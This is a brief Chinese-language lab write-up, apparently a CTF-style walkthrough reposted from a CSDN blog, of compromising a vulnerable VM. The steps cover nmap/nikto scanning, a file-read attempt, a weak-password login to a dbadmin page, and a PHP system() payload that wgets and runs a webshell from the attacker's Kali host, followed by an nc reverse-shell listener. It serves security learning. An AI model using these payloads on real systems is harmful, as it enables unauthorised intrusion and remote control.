kali 192.168.20.128
靶机 192.168.20.133
链接:https://pan.baidu.com/s/1iz-wj3MzwyhKjKUGZrLK-g 提取码:u6tg
nmap -A -v -T4 192.168.20.133
探测敏感信息
nikto -host http://192.168.20.133
发现疑似页面dbadmin
深入挖掘
开始扫描
查看攻击路径和攻击方式
查看URL
把passwd换成shadow 没有返回shadow信息
弱口令登录
尝试用密码admin进行登录
登陆成功
使用webshell
使用/usr/share/webshells/php/下的webshell
将kali中的webshel文件放在web网站主目录下面
修改shell.php里面的内容
新建数据库
新建数据表
新建字段
<?php system("cd /tmp;wget http://192.168.20.128/shell.php;chmod +x shell.php;php shell.php");?>
注意:没安装apache;wget不能下载kali机器的shell.php
安装apache2
apt-get install apache2
service apache2 start
监听反弹shell
创建监听端
nc -lvvp 4444
执行文件反弹shell
优化终端
本文为互联网自动采集或经作者授权后发布,本文观点不代表立场,若侵权下架请联系我们删帖处理!文章出自:https://blog.csdn.net/m0_63127854/article/details/124971563